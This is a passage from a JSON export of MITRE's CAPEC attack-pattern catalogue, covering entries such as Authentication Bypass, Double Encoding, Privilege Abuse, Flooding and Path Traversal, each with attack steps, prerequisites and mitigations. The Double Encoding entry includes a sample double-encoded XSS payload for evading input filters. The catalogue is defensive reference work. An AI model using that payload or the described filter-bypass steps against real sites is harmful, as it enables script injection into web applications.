Credentials\\" attack patterns.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way."},"Resources_Required":{"Resource":"A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"287"},{"CWE_ID":"1244"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1548","Entry_Name":"Abuse Elevation Control Mechanism"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"115":{"ID":"115","Name":"Authentication Bypass","Abstraction":"Meta","Status":"Draft","Description":"An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place. This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc."},"Resources_Required":{"Resource":"A client application, such as a web browser, or a scripting language capable of interacting with the target."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"287"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1548","Entry_Name":"Abuse Elevation Control Mechanism"}},"References":{"Reference":{"External_Reference_ID":"REF-598","Section":"Testing for Bypassing Authentication Schema"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"116":{"ID":"116","Name":"Excavation","Abstraction":"Meta","Status":"Stable","Description":"An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes. This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"CanPrecede","CAPEC_ID":"163"}},"Prerequisites":{"Prerequisite":"An adversary requires some way of interacting with the system."},"Resources_Required":{"Resource":"A tool, such as an Adversary in the Middle (CAPEC-94) Proxy or a fuzzer, that is capable of generating and injecting custom inputs to be used in the attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Minimize error/response output to only what is necessary for functional use or corrective language.","Remove potentially sensitive information that is not necessary for the application\'s functionality."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"200"},{"CWE_ID":"1243"}]},"Notes":{"Note":["Large quantities of data is often moved from the target system to some other adversary controlled system. Data found on a target system might require extensive resources to be fully analyzed. Using these resources on the target system might enable a defender to detect the adversary. Additionally, proper analysis tools required might not be available on the target system.",{"Type":"Other"},"This attack differs from Data Interception and other data collection attacks in that the attacker actively queries the target rather than simply watching for the target to reveal information.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Other_Notes, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Resources_Required"}]}},"117":{"ID":"117","Name":"Interception","Abstraction":"Meta","Status":"Stable","Description":"An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must transmit data over a medium that is accessible to the adversary."},"Resources_Required":{"Resource":"The adversary must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"319"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"120":{"ID":"120","Name":"Double Encoding","Abstraction":"Detailed","Status":"Draft","Description":"The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery.","Manually inspect the application to find entry points."]},{"Step":"2","Phase":"Experiment","Description":"[Probe entry points to locate vulnerabilities] Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.","Technique":"Try to use double-encoding to bypass validation routines."}]},"Prerequisites":{"Prerequisite":["The target\'s filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.","The application accepts and decodes URL string request.","The application performs insufficient filtering/canonicalization on the URLs."]},"Resources_Required":{"Resource":"Tools that automate encoding of data can assist the adversary in generating encoded strings."},"Mitigations":{"Mitigation":["Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.","Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.","When client input is required from web-based forms, avoid using the \\"GET\\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \\"POST method whenever possible.","Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.","Refer to the RFCs to safely decode URL.","Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.","There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)."]},"Example_Instances":{"Example":{"p":["Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:","Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code."],"div":["%253Cscript%253Ealert(\'This is an XSS Attack\')%253C%252Fscript%253E",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"177"},{"CWE_ID":"181"},{"CWE_ID":"183"},{"CWE_ID":"184"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"692"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"121":{"ID":"121","Name":"Exploit Non-Production Interfaces","Abstraction":"Standard","Status":"Stable","Description":{"p":["An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable. Non-production interfaces are insecure by default and should not be resident on production systems, since they may reveal sensitive information or functionality that should not be known to end-users. However, such interfaces may be unintentionally left enabled on a production system due to configuration errors, supply chain mismanagement, or other pre-deployment activities.","Ultimately, failure to properly disable non-production interfaces, in a production environment, may expose a great deal of diagnostic information or functionality to an adversary, which can be utilized to further refine their attack. Moreover, many non-production interfaces do not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may contain many flaws and vulnerabilities that could allow an adversary to severely disrupt a target."]},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"113"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Vulnerable Interface] An adversary explores a target system for sample or test interfaces that have not been disabled by a system administrator and which may be exploitable by the adversary.","Technique":"If needed, the adversary explores an organization\'s network to determine if any specific systems of interest exist."},{"Step":"2","Phase":"Exploit","Description":"[Leverage Test Interface to Execute Attacks] Once an adversary has discovered a system with a non-production interface, the interface is leveraged to exploit the system and/or conduct various attacks.","Technique":"The adversary can leverage the sample or test interface to conduct several types of attacks such as Adversary-in-the-Middle attacks (CAPEC-94), keylogging, Cross Site Scripting (XSS), hardware manipulation attacks, and more."}]},"Prerequisites":{"Prerequisite":"The target must have configured non-production interfaces and failed to secure or remove them when brought into a production environment."},"Skills_Required":{"Skill":["Exploiting non-production interfaces requires significant skill and knowledge about the potential non-production interfaces left enabled in production.",{"Level":"High"}]},"Resources_Required":{"Resource":"For some interfaces, the attacker will need that appropriate client application or hardware that interfaces with the interface. Other non-production interfaces can be executed using simple tools, such as web browsers or console windows. In some cases, an attacker may need to be able to authenticate to the target before it can access the vulnerable interface."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":["Gain Privileges","Bypass Protection Mechanism"]},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Read Data","Execute Unauthorized Commands"]},{"Scope":["Access Control","Integrity"],"Impact":["Modify Data","Alter Execution Logic"]}]},"Mitigations":{"Mitigation":"Ensure that production systems to not contain non-production interfaces and that these interfaces are only used in development environments."},"Example_Instances":{"Example":[{"p":"Some software applications include application programming interfaces (APIs) that are intended to allow an administrator to test and refine their domain. These APIs are typically disabled once a system enters a production environment, but may be left in an insecure state due to a configuration error or mismanagement."},{"p":"Many hardware systems leverage bits typically reserved for future functionality for testing and debugging purposes. If these reserved bits remain enabled in a production environment, it could allow an adversary to induce unwanted/unsupported behavior in the hardware."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"489"},{"CWE_ID":"1209"},{"CWE_ID":"1259"},{"CWE_ID":"1267"},{"CWE_ID":"1270"},{"CWE_ID":"1294"},{"CWE_ID":"1295"},{"CWE_ID":"1296"},{"CWE_ID":"1302"},{"CWE_ID":"1313"}]},"References":{"Reference":[{"External_Reference_ID":"REF-588"},{"External_Reference_ID":"REF-589"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Description, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, @Status, Consequences, Description, Execution_Flow, Mitigations, Prerequisites, References, Related_Weaknesses, Resources_Required, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Locate and Exploit Test APIs",{"Date":"2015-12-07"},"Exploit Test APIs",{"Date":"2020-07-30"}]}},"122":{"ID":"122","Name":"Privilege Abuse","Abstraction":"Meta","Status":"Draft","Description":"An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"CanPrecede","CAPEC_ID":"664"}},"Prerequisites":{"Prerequisite":["The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.","The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources."]},"Skills_Required":{"Skill":["Attacker can leverage privileged features they already have access to without additional effort or skill. Attacker is only required to have access to an account with improper priveleges.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The ability to access the target is required."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Authorization","Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":"Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts."},"Example_Instances":{"Example":{"p":"Improperly configured account privileges allowed unauthorized users on a hospital\'s network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"269"},{"CWE_ID":"732"},{"CWE_ID":"1317"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Example_Instances, Likelihood_Of_Attack, Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"123":{"ID":"123","Name":"Buffer Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An adversary manipulates an application\'s interaction with a buffer in an attempt to read or modify data they shouldn\'t have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Prerequisites":{"Prerequisite":"The adversary must identify a programmatic means for interacting with a buffer, such as vulnerable C code, and be able to provide input to this interaction."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution","Note":"A buffer manipulation attack often results in a crash of the application due to the corruption of memory."},{"Scope":"Confidentiality","Impact":["Execute Unauthorized Commands","Modify Data","Read Data"],"Note":"If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses."}]},"Mitigations":{"Mitigation":"To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. Finally, there may be operating system level preventative functionality that can be applied."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"119"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"124":{"ID":"124","Name":"Shared Resource Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":["The target applications, threads or functions must share resources between themselves.","The adversary must be able to manipulate some piece of the shared resource either directly or indirectly and the other users of the data must accept the changed data as valid. Usually this requires that the adversary be able to compromise one of the sharing applications or threads in order to manipulate the shared data."]},"Resources_Required":{"Resource":"None: The attacker does not need any specialized resources to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1189"},{"CWE_ID":"1331"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Prerequisites, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Attack through Shared Data",{"Date":"2017-01-09"},"Shared Data Manipulation",{"Date":"2020-07-30"}]}},"125":{"ID":"125","Name":"Flooding","Abstraction":"Meta","Status":"Stable","Description":"An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target\'s operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"Any target that services requests is vulnerable to this attack on some level of scale."},"Resources_Required":{"Resource":"A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"A successful flooding attack compromises the availability of the target system\'s service by exhausting its available resources."}},"Mitigations":{"Mitigation":["Ensure that protocols have specific limits of scale configured.","Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.","Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"404"},{"CWE_ID":"770"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"},{"Taxonomy_Name":"WASC","Entry_ID":"10","Entry_Name":"Denial of Service"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Traffic flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"126":{"ID":"126","Name":"Path Traversal","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\\\) and/or dots (.)) to reach desired directories or files.","Alternate_Terms":{"Alternate_Term":{"Term":"Directory Traversal"}},"Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"153"},{"Nature":"CanPrecede","CAPEC_ID":"664"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Fingerprinting of the operating system] In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application to Identify User-controllable Inputs] The attacker surveys the target application to identify all user-controllable file inputs"},{"Step":"3","Phase":"Experiment","Description":"[Vary inputs, looking for malicious results] Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application"},{"Step":"4","Phase":"Exploit","Description":"[Manipulate files accessible by the application] The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)"}]},"Prerequisites":{"Prerequisite":["The attacker must be able to control the path that is requested of the target.","The target must fail to adequately sanitize incoming paths"]},"Skills_Required":{"Skill":["Simple command line attacks or to inject the malicious payload in a web page.",{"Level":"Low"},"Customizing attacks to bypass non trivial filters in the application.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application."},"Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Commands","Note":"The attacker may be able to create or 